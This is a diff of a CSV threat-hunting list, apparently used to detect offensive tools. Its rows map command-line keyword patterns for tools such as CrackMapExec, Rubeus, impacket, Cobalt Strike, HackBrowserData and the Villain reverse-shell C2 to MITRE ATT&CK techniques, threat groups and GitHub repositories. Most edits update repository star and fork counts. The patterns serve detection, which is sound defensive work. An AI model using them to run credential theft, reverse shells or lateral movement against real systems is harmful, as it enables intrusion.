collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* gpp_password*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" "* gpsd-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* GreatSCT/*","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","0","N/A","N/A","10","1103","214","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z" -"* --greeting * --personalize *--securelink*","offensive_tool_keyword","teamsphisher","Send phishing messages and attachments to Microsoft Teams users","T1566.001 - T1566.002 - T1204.001","TA0001 - TA0005","N/A","N/A","phishing","https://github.com/Octoberfest7/TeamsPhisher","1","0","N/A","N/A","9","831","109","2023-07-14T00:23:30Z","2023-07-03T02:19:47Z" -"* -grouper2 -Command *","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"* -H * -u * -p * -r *C$/Users*","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/ShawnDEvans/smbmap","1","0","N/A","10","10","1554","344","2023-09-14T20:51:52Z","2015-03-16T13:15:00Z" +"* --greeting * --personalize *--securelink*","offensive_tool_keyword","teamsphisher","Send phishing messages and attachments to Microsoft Teams users","T1566.001 - T1566.002 - T1204.001","TA0001 - TA0005","N/A","N/A","phishing","https://github.com/Octoberfest7/TeamsPhisher","1","0","N/A","N/A","9","832","109","2023-07-14T00:23:30Z","2023-07-03T02:19:47Z" +"* -grouper2 -Command *","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"* -H * -u * -p * -r *C$/Users*","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/ShawnDEvans/smbmap","1","0","N/A","10","10","1555","344","2023-09-14T20:51:52Z","2015-03-16T13:15:00Z" "* -h *-p * -c cypher.bin -k key.bin*","offensive_tool_keyword","HadesLdr","Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/CognisysGroup/HadesLdr","1","0","N/A","10","3","221","33","2023-07-15T21:23:49Z","2023-07-12T11:44:07Z" -"* hack.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"* HackBrowserData","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555 - T1189 - T1217 - T1185","TA0002 - TA0009 - TA0001 - TA0010","N/A","N/A","Exploitation tools","https://github.com/moonD4rk/HackBrowserData","1","0","N/A","N/A","10","8729","1373","2023-10-02T14:38:41Z","2020-06-18T03:24:31Z" +"* hack.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* HackBrowserData","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555 - T1189 - T1217 - T1185","TA0002 - TA0009 - TA0001 - TA0010","N/A","N/A","Exploitation tools","https://github.com/moonD4rk/HackBrowserData","1","0","N/A","N/A","10","8730","1373","2023-10-02T14:38:41Z","2020-06-18T03:24:31Z" "* HackBrowserData*","offensive_tool_keyword","cobaltstrike","reflective module for HackBrowserData","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/idiotc4t/Reflective-HackBrowserData","1","0","N/A","10","10","148","21","2021-03-13T08:42:18Z","2021-03-13T08:35:01Z" "* hackergu *","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* hadoop-datanode-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" @@ -762,30 +762,30 @@ "* hadoop-secondary-namenode-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* hadoop-tasktracker-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* Hak5.sh*","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","10","4","348","73","2023-09-30T13:40:08Z","2022-03-23T15:52:41Z" -"* harvest * /monitorinterval:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* harvest * /monitorinterval:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" "* -hasbootstraphint *","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" -"* -hashes * -spn * -impersonate *","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","0","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"* -hashes lm:nt -gpo-id * -powershell *","offensive_tool_keyword","pyGPOAbuse","python implementation of SharpGPOAbuse","T1566.001 - T1059.006 - T1112","TA0001 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/Hackndo/pyGPOAbuse","1","0","N/A","8","2","178","26","2023-01-20T19:02:09Z","2020-05-10T21:21:27Z" +"* -hashes * -spn * -impersonate *","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"* -hashes lm:nt -gpo-id * -powershell *","offensive_tool_keyword","pyGPOAbuse","python implementation of SharpGPOAbuse","T1566.001 - T1059.006 - T1112","TA0001 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/Hackndo/pyGPOAbuse","1","0","N/A","8","2","180","26","2023-01-20T19:02:09Z","2020-05-10T21:21:27Z" "* --hash-type * --attack-mode *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"* hashview.py*","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","0","N/A","10","4","319","38","2023-09-22T21:30:50Z","2020-11-23T19:21:06Z" -"* hashview-agent *","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","0","N/A","10","4","319","38","2023-09-22T21:30:50Z","2020-11-23T19:21:06Z" -"* havoc-client*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" +"* hashview.py*","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","0","N/A","10","4","320","38","2023-09-22T21:30:50Z","2020-11-23T19:21:06Z" +"* hashview-agent *","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","0","N/A","10","4","320","38","2023-09-22T21:30:50Z","2020-11-23T19:21:06Z" +"* havoc-client*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" "* hbase-master-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* hbase-region-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* hddtemp-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* HiddenDesktop.cna*","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","0","N/A","10","10","925","147","2023-05-25T21:27:20Z","2023-05-21T00:57:43Z" +"* HiddenDesktop.cna*","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","0","N/A","10","10","926","147","2023-05-25T21:27:20Z","2023-05-21T00:57:43Z" "* hnap-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* --hoax-port *","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","0","N/A","10","10","3252","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"* --hoax-port *","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","0","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" "* hollow.x64.*","offensive_tool_keyword","cobaltstrike","EarlyBird process hollowing technique (BOF) - Spawns a process in a suspended state. inject shellcode. hijack main thread with APC and execute shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/HOLLOW","1","0","N/A","10","10","235","56","2023-03-08T15:51:19Z","2021-07-21T15:58:18Z" "* --host * --port * --executable *.exe --command *cmd.exe*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "* hostenum.py *","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script function and alias to perform some rudimentary Windows host enumeration with Beacon built-in commands","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/red-team-scripts","1","0","N/A","10","10","1089","197","2019-11-18T05:30:18Z","2017-05-01T13:53:05Z" -"* --host-file *.txt -u * --prompt --admin --no-banner*","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/ShawnDEvans/smbmap","1","0","N/A","10","10","1554","344","2023-09-14T20:51:52Z","2015-03-16T13:15:00Z" +"* --host-file *.txt -u * --prompt --admin --no-banner*","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/ShawnDEvans/smbmap","1","0","N/A","10","10","1555","344","2023-09-14T20:51:52Z","2015-03-16T13:15:00Z" "* hostmap-bfk.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* hostmap-crtsh.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* hostmap-robtex.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* -Hosts * -TopPorts *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-Portscan.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"* hping3 *","offensive_tool_keyword","hping","hping3 is a network tool able to send custom TCP/IP","T1046 - T1190 - T1200","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/antirez/hping","1","0","N/A","N/A","10","1296","326","2022-10-04T12:14:24Z","2012-06-13T17:41:54Z" -"* http://localhost:8080 -o agent*","offensive_tool_keyword","Ares","Python C2 botnet and backdoor ","T1105 - T1102 - T1055","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/sweetsoftware/Ares","1","0","N/A","10","10","1439","523","2023-03-02T12:43:09Z","2015-10-18T12:26:27Z" +"* -Hosts * -TopPorts *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 